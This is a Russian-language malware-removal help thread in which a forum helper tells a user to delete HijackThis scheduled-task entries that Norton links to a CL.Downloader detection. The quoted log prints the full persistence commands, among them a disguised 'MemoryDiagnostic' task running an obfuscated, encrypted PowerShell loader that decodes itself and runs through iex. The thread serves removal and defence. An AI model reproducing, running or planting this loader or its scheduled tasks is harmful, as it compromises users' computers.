Здравствуйте! Norton Security с периодичностью 20 мин находит вирус CL.Downloader!gen11 в файле powershell.exe. Стандартными средствами удалить не получается. Просьба помочь.
Вирус CL.Downloader!gen11
Здравствуйте! Norton Security с периодичностью 20 мин находит вирус CL.Downloader!gen11 в файле powershell.exe. Стандартными средствами удалить не получается. Просьба помочь.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) fdo, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:Проблема будет устранена.Код:O22 - Task: EOSv3 Scheduler onLogOn - C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\ESETOnlineScanner_RUS (1).exe LOGON (file missing) O22 - Task: EOSv3 Scheduler onTime - C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\ESETOnlineScanner_RUS (1).exe SCHED (file missing) O22 - Task: \Microsoft\Windows\Maintenance\WinDAT - C:\WINDOWS\system32\cmd.exe /c dlhosts.exe || dlchosts.exe O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.vbs (file missing) O22 - Task: \Microsoft\Windows\MemoryDiagnostic\MemoryDiagnostic - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$ddd = 'v23MR48Otiy7Xs0vzzW1OawoogX/OdMNjBSLWNI+/B+RYeFsoGHzS+50lQSMBdUSlWGkGcMi5Cu1N/MFpia8CoIJlw6cPq5eziS2Lf4uyAHsKb4HkgWYFt1C4gOKY+AnwHbySsxhkzWKD4Mb1TOtRtA0uTGgIbZStTXGUNpJwEaPLMAjh3X5bOM9yAHvKqYAmjKeE4h06ASjPLdK/HbnEP4s1QScScBGjz/aHJJp+kj7Z+k2/mCYF50Dj1/Zd/ocjWO2Lfw90xf+drACnQ6PX9lk+kvadKN5/Hz+HaYggV7cEogSwDXpXrlj+VvrYPYL9XeUTdFb3wGZLL8CjXajWvpy8hHoR54BnVvfEMB1/hPeLtZa92DyAfYqsgqWFp4QiUyhSrh04mTMcvUBrTCiEYoJlQXVOfUViSvia+R25RC7V4gWjAWWTLRetSOKdOho40HjBf9hg03cEogS01b+BKxj/nnhffUByHCDAJkN00vUOLUim2fpXeFW6ACzLdhM2EjfC9YzrUeVMOd993ukTaBtl02jCZUWoDX4FN4r42yuILZWsn/VFsldvAeJPMkRkGLiZK4+yw31bZwQlUDKQtBc+giXa/hkria9QPFuzD6LFIkLk3bGK5Nn+WHTKbwF+XfZPpUBjwqgK6ECkXPjbaYg41OxX5wEjAimWMdi8h7WXeBo+nvbXqFB203cE8pL1DiyS5dgpS39IqZJ92HRVtEb3wiXOqZS0GXiZKwo+wH3d5Qe3AqRScAztQSVJLZ0qnLiWblshRGIWtRN2XvxX5dovCf+e/Zb8jnVDNpb3xDASsgJjXLoZKBd4xC1U5QHqgWKF5hi7y3EPM5763LyAbMgkAHRW98Q01D3HJFxzHz6fNQB/22DAJsUxkabcPcDmz2pe6BG9QHpRZYAlhTGRohwoFSMdf00qmGoI/5wowCLEJQMjnSzWcUi7m2zN/QX6yqiEZkUjhG+fv8VxW/rIdV66BDGIJIB2E2VB90iq0LXfehx52f7QOk5lQCbQNM5rmjoBJtro0rhffAB6XCsX8ImiQ2QU/oDmzC5Wvph7wr8LNkLnRfWDZ97/hOKJt5w/WfjCbVNvkurFIkHnHzJFZ9i6HumN/QX6yq2AIwynhGNfvUDm1X5e+ty60yyLdhLqgWaBql+3h6aLqQgpzOuQPpg2keNWZIXl37wH9wvtnTnda5EtmqeEdhEiUuGdOMZinupe7NI1R3ocJQI1jSeGok/3h6daelg4HTbXqFRpSPATrwHiULvApdo6iGqYa9fv2XMTdwSxkaPP+gAkm/5IawzpEipLdg+yD3ARpIsq0uXYKUt7zOrAeokwEyDRJRf1Xj+CN4i/1K/Tq9E5yS+EIxNqBaPePUXg2Pheut64Ey/ZdFInRHbVdRqvwjDJK8ypl3jE7ZLkw+dA49CrmjoBJtro13mYeMF/22fAtYtjhaYabNUinT4bKI39D+qWd0+igWdP9lpslnQReFm/XauTaBtl03cGNIZ2X6mUs4k8GziYOMfv2vMR8lChh+YfegVhWP1YPpuogumIJ5LixWZEYlj8h6ZLr0lrkjVHehwlAjWLZoWlUyhSrNv4yG7I7ZUtyTVCtYsngyaZfNZ1z2pe/0u4gH4JNk+qxmIFph8tSSbfvkny33lC/9tnwKlWsE3qVejXrlj+Uv3Z+MXsyCeTNFA00aUOrlGlXO4cPxY4Vz8Jthe3BKIX6Zk6RmjPLdM/XDnFP5AkBGZM48QlH/8WKVF4mf4dvQQxj7LMZcimhGYJ68jinTkZ+k7ohboLdhe3BLGOa5o6ASba6NH62eoM/5mowCJFZ4RiUyhSr106Gj6dq5A+mDaR94RxkDWNekD1z2pe6BS6gj0c7AQjA+pB5l46RWdcrAt6HLqF/4/1RfWNYgHj1D8FZBysC37cr1A6SqBF5cYgl/ZYaBUjCjKbPpB4xfra58WnUjSHrJk712wc+FltQ==';iex('$'+'d=([regex]::Matches(''==QKpcSKkRCKn5WayR3UnsyJ0V2RugjRUVlO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTt1JogXZphCI4VWa7kiclJWb15GbhlmclNlLqJ2bkAyKgcCInAyKgwWZk9WTuomYvRCKgkSKkRGZkgyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WoAyYlRGI9ACZksjclJWb15GbhlmclNFIswWZk9WTgQ3YlxWZzBCfg03JwUkVJJFRMF0QJNVWIBFXuwFXnAScl1CIElUZjlmdlRkLfRyegUmclh2dgwHIlZXayR2azlGZfJzMul2dgkWb3dGI9Aiai9GJ9tjYjRCIuJXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvhnYtASKyUTMgI3bi1CIzRCIk5WYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVGd5JEdldkL4YEVVpjOddmbpR2bj5WRuQHelRlLtVGdzl3UbBSPgIGcksXKzNXYwRSXn5WayR3cbBCLiNGJd11WlRXeitFKjVGZg42bpR3YuVnZ'',''.'',''RightToLeft'') | ForEach {$_.value}) -join '''';$'+'d=[Sy'+'stem.Te'+'xt'+'.E'+'ncod'+'ing]:'+':U'+'TF'+2*2*2+'.Get'+'Strin'+'g([Sy'+'stem.Conv'+'ert]:'+':FromBa'+'se'+8*8+'String($d));$'+'d|i'+'ex;')"
WBR,
Vadim
Спасибо! Проблема решена.
Уважаемый(ая) fdo, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
